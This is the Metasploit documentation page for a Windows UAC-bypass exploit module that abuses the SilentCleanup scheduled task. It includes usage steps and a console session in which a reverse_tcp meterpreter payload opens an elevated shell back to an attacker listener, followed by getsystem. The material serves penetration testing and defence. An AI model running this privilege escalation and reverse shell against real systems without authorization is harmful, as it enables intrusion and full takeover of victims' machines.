CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/local/bypassuac_silentcleanup.md
Views: 1904

Introduction

This module will bypass UAC on any Windows installation with Powershell installed.

There's a task in Windows Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges. When it runs, it executes the file %windir%\system32\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables, %windir% (normally pointing to C:\Windows) can be changed to point to whatever we want, and it'll run as admin. In order to work, the code must be saved in a script file somewhere, it cannot be run directly from powershell or from the run dialog.

Usage

  1. Create a session on the target system under the context of a local administrative user.

  2. Begin interacting with the module: use exploit/windows/local/bypassuac_silentcleanup.

  3. Set the PAYLOAD and configure it correctly, making sure the architecture is correct.

  4. If an existing handler is configured to receive the elevated session, then the module's handler should be disabled: set DisablePayloadHandler true.

  5. Make sure that the SESSION value is set to the existing session identifier.

  6. Invoke the module: run.

Scenarios

msf5 > sessions

Active sessions
===============

  Id  Name  Type                     Information                               Connection
  --  ----  ----                     -----------                               ----------
  6         meterpreter x86/windows  DESKTOP-T2TGIHP\Carter @ DESKTOP-T2TGIHP  192.168.1.x:4444 -> 192.168.1.x:53685 (192.168.1.x)

msf5 > use exploit/windows/local/bypassuac_silentcleanup 
msf5 exploit(windows/local/bypassuac_silentcleanup) > set SESSION 6
SESSION => 6
msf5 exploit(windows/local/bypassuac_silentcleanup) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/bypassuac_silentcleanup) > set LHOST 192.168.1.xx
LHOST => 192.168.1.xx
msf5 exploit(windows/local/bypassuac_silentcleanup) > options

Module options (exploit/windows/local/bypassuac_silentcleanup):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   SESSION    6                yes       The session to run this module on.
   SLEEPTIME  0                no        The time (ms) to sleep before running SilentCleanup


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.55     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows


msf5 exploit(windows/local/bypassuac_silentcleanup) > run

[*] Started reverse TCP handler on 192.168.1.xx:4444 
[+] Part of Administrators group! Continuing...
[*] Sending stage (206403 bytes) to 192.168.1.x
[*] Meterpreter session 10 opened (192.168.1.xx:4444 -> 192.168.1.x:55538) at 2019-06-20 15:00:14 -0400

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > bg
[*] Backgrounding session 10...
msf5 exploit(windows/local/bypassuac_silentcleanup) >